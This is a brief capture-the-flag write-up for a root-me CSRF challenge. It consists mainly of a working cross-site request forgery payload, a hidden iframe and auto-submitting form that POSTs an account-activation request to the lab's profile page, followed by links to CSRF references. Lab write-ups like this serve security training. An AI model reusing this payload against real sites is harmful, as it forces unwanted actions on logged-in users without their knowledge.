CSRF: zero protection

root-me challenge: CSRF - 0 protection: Activate your account to access intranet.

---

<iframe style="display:none" name="csrfframe"></iframe>
<form name="test" target="csrfframe" enctype="multipart/form-data" action="http://challenge01.root-me.org/web-client/ch22/index.php?action=profile" method="POST">
  <input type="hidden" name="username" value="barzh" />
  <input type="hidden" name="status" value="on" />
</form>
<script>document.test.submit()</script>

Resources

• https://portswigger.net/web-security/csrf

• PayloadsAllTheThings/CSRF Injection/

• HackTricks: CSRF (Cross Site Request Forgery)